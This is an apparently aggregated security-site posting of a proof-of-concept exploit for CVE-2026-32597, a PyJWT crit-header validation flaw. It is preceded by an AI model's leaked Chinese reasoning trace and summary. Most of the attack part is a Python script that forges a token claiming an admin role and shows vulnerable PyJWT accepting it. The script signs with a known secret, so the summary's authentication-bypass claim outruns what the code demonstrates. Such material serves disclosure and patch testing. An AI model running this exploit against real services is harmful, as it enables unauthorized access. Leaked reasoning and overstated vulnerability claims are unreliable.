好的,我现在需要帮用户总结一篇文章的内容,控制在100个字以内。用户已经提供了文章的内容,看起来是一个关于PyJWT漏洞的详细说明。 首先,我需要快速浏览文章内容。文章标题是“PyJWT < 2.12.0 crit header bypass / Insufficient crit validation”,提到了CVE编号和作者信息。接着是代码部分,展示了如何生成一个恶意的JWT令牌,利用了crit头的验证不足。 文章描述了PyJWT在处理未知关键头参数时的问题,允许攻击者绕过认证。漏洞影响的是PyJWT版本小于2.12.0的版本,并且已经在2.12.0中修复。CVSS评分是7.5,属于中等偏高风险。 接下来,我需要将这些关键点浓缩到100字以内。要包括漏洞名称、影响范围、问题描述、攻击方式、修复版本以及CVSS评分。 可能的结构是:PyJWT <2.12.0存在crit头验证不足漏洞,允许攻击者绕过认证,生成恶意令牌被接受,已修复于2.12.0,CVSS7.5。 检查字数是否符合要求,并确保信息准确无误。 </think> PyJWT < 2.12.0 存在 crit 头验证不足漏洞,允许攻击者绕过认证机制。该漏洞源于 PyJWT 未能正确验证未知关键头参数(crit),导致恶意 JWT 令牌被接受。已修复于 PyJWT 2.12.0 版本,CVSS 评分为 7.5。 2026-3-14 22:33:56 Author: cxsecurity.com(查看原文) 阅读量:8 收藏
PyJWT < 2.12.0 crit header bypass / Insufficient crit validation
#!/usr/bin/env python3 # Exploit Title: PyJWT < 2.12.0 crit header bypass / Insufficient crit validation # CVE: CVE-2026-32597 # Date: 2026-03 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://github.com/jpadilla/pyjwt # Software Link: https://pypi.org/project/PyJWT/ # Affected: PyJWT < 2.12.0 # Tested on: # Category: Authentication Bypass # Platform: Python # Exploit Type: Proof of Concept # CVSS: 7.5 # CWE : CWE-345, CWE-863 # Description: PyJWT does not reject JWTs containing unknown critical header parameters (crit) # Fixed in: PyJWT 2.12.0 # Usage: # python3 exploit.py # # Examples: # python3 exploit.py # # Notes: Demonstrates acceptance of token with unknown critical extension print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-32597 • PyJWT crit header bypass ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import jwt import hmac import hashlib import base64 import json def b64url_encode(data): if isinstance(data, str): data = data.encode('utf-8') encoded = base64.urlsafe_b64encode(data).rstrip(b'=') return encoded.decode('utf-8') header = { "alg": "HS256", "crit": ["x-custom-policy"], "x-custom-policy": "require-mfa-and-binding" } payload = { "sub": "attacker", "role": "admin", "exp": 9999999999 } secret = b"secret-key" header_str = json.dumps(header, separators=(',', ':')) payload_str = json.dumps(payload, separators=(',', ':')) h = b64url_encode(header_str) p = b64url_encode(payload_str) signing_input = f"{h}.{p}".encode('utf-8') signature = hmac.new(secret, signing_input, hashlib.sha256).digest() sig = b64url_encode(signature) malicious_token = f"{h}.{p}.{sig}" print("Generated malicious token:") print(malicious_token) print("\n") print("Decoding with PyJWT (vulnerable versions accept this token):") try: decoded = jwt.decode( malicious_token, secret, algorithms=["HS256"], options={"verify_signature": True} ) print("TOKEN ACCEPTED (vulnerable behavior):") print(decoded) except jwt.exceptions.InvalidTokenError as e: print("TOKEN REJECTED (correct / patched behavior):") print(e) except Exception as e: print("Unexpected error:") print(e)
References:
https://github.com/jpadilla/pyjwt/security/advisories/GHSA-752w-5fwx-jx9f
https://datatracker.ietf.org/doc/html/rfc7515#section-4.1.11
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
Copyright 2026, cxsecurity.com
如有侵权请联系:admin#unsafe.sh